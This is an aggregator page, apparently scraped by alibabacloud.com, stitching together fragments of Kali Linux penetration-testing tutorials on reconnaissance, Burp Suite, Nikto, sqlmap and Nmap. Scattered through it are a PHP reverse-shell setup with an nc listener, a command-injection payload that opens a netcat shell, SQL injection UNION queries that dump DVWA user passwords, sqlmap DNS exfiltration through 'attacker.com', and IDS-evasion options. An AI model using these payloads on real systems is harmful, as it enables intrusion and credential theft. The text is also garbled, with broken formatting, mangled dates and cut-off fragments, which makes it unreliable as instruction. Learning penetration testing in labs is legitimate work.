Read about penetration testing training with kali linux, The latest news, videos, and discussion topics about penetration testing training with kali linux from alibabacloud.com
1, about Kali LinuxKali Linux is a Debian-based Linux distribution that is designed for digital forensics and penetration testing. Maintained and financed by Offensive Security Ltd. [1] The first Mati Aharoni and Devon Kearns by offensive security were completed by rewriting
Kali Linux is a comprehensive penetration testing platform with advanced tools that can be used to identify, detect, and exploit undetected vulnerabilities in the target network. With Kali Linux, you can apply the appropriate test
LinkedInThe user names collected from LinkedIn will be of great use in subsequent tests. For example: social engineering attacks.MetagoofilMetagoofil is a tool that uses Google to gather information and currently supports the following types:1. Word2.Ppt3.Excel4. PdfCommands to use Metagoofil:#MetagoofilDemonstrate by an example:#metagoofil-D baidu.com-l 20-t doc,pdf-n 5-f Test.html-o testThrough this tool we can see very much information collected, such as user name, path information. We can u
Server:ns1.sina.com.cnName Server:ns2.sina.com.cnName Server: Ns3.sina.com.cnName Server:ns4.sina.com.cnRegistration Time:1998- One- - xx:xx:xxExpiration Time:2019- A-Geneva the: +: *dnssec:unsignedThe results of the WHOIS return include information about the DNS server and the registrant's contact details, registration time and expiry time, and so on.Three. DNS Record analysisTo find all the hosts and IPs under the domain name, you can use a few tools belowNote: DNS records are divided into t
-backdoor.php[emailprotected]:/usr/share/webshells
/php# CP php-reverse-shell.php/root/3.php[emailprotected]:/usr/share/webshells/php# #修改shell中反弹连接的IP
#使用nc侦听反弹端口1234 NC terminal cannot use the TAB key
#将shell代码复制粘贴进POST, Go Send "This method is relatively hidden, not easy to hair Now "
############################################################################
When some commands, such as ifc
file content "normal PHP code will not be directly downloaded by the browser"
# # #常用方法: path +?-s can view most PHP server-side code "Get code, you can do code audit"
User "Use Users"
# #arachni的cookie信息会在一定时间内变化 "Identity authentication to protect against cookie information"
Dispatchers dispatching "remote and grid for advanced options"
You need to use commands to implement
Remote
./ARACHNI_RPCD--addr
"
And then access the file in the browser
############################################################### ##############
Note: In a Linux system, when you assign permissions to a file, ensure that the same permissions are assigned to its hierarchical directory
# # # ##########################################################################
Remote file contains RFI
fips-U.S. Federal Information Processing standards (Federal Information Processing Standard)
5, encoding "(Mixed mode encoding) for injection attacks, to prevent the Web application filter"
6, comparer content comparison "has the guide"
##########################################################################################Truncation Agent Tool
Paros "Kali int
mechanism that is stronger than HTTPS
Use OAuth or HMAC for authentication, HMAC authentication using the C/S shared key encryption API key
RESTful should allow only authenticated users to use the PUT, delete method
Use random tokens to prevent CSRF attacks
Recommended to deploy a strict whitelist-based approach to user-submitted parameter filtering
Disinfection of error messages
Direct object references should be strictly authenticated (the e-commerce company takes the
example:)
# #当客户端和burpsuite都在一台机器上, modify the native Hosts file to resolve the DNS resolution of the machine IP, start invisible, and use the following configuration, then Burpsuite will not do DNS resolution with the native Hosts file
#代理情况下 "Absolute path" Non-proxy "relative path" (Burpsuite will be stitched together to send)
#客户端不按规范发http请求送, may not contain host header, use DNS spoofing to resolve
#一个web页面有多个域名, may correspond to multipl
by administrators"
useragent=mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; trident/5.0)
#抓包分析, get cookies
#修改cookie信息 "Get Nikto authenticated for further scanning"
-evasion: Using the evasion techniques of IDs in Libwhisker, you can use the following types
1, Random URL encoding (non-UTF-8 mode)
2. Optional path (/./)
3. URL to end prematurely
4. Take precedence over long random strings
5. Parameter spoofin
#脚本认证Script, you have to write your own script "script template"
#默认情况下, only specify the name of the session, you must manually add another session "such As: security"
#显示http Session Tab
#用于使用不同用户登录审计 to determine if there is any authority
8, Note/tag "add A variety of labels, easy to audit"
9. Passive Scan
####
"Curl": Command line mode, custom URL, initiating HTTP request
#high级别
C. Exploit this vulnerability to allow operations such as open ports to be performed
such as:; Mkfifo/tmp/pipe;sh/tmp/pipe | NC-NLP 4444 >/tmp/pipe
D. Rebound Shell
The shell of the machine to which the shell s
all the tools are preinstalled in a Linux system. Among them, the typical operating system. Is the Kali Linux used in this book.The system is mainly used for penetrant testing.It comes preloaded with a number of penetration testing software, including the Nmapport scanner,
library" ' Union select Table_name,table_schema from Information_schema.tables where table_schema= ' dvwa '--+ ' guessing account password location by table name ' 3. Query all the columns in the Users table (user_id, first_name, last_name, user, password, avatar) ' Union select Table_name,column_name from Information_schema.columns where table_schema= ' Dvwa ' and table_name= ' users '- -+ 4, query the contents of user, password column ' Union select User,password from dvwa.users--+ ' Unio
Query 1-10 column, up to 50 columns with--level increase--union-clos 6-9--union-charUnion queries use NULL by default, and in extreme cases null may be invalidated, at which point the value can be specified manually--union-char 123 "Web application needs to be analyzed in advance"--dns-domainScenario : An attacker controls a DNS server and uses this feature to increase data extraction rates--dns-domain attacker.com--second-orderThe result of a page injection, reflected from another page--second
to run the script on the target's open port. You may want to look at some Nmap scripts, which are in: https://nmap.org/nsedoc/scripts/ .
See AlsoAlthough it is most popular, Nmap is not the only port scanner available, and, depending on the preferences, may not be the best. Here are some of the other alternatives included in the Kali:
Unicornscan
Hping3
Masscan
Amap
Metasploit Scanning Module
2.2 Identifying the Web
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.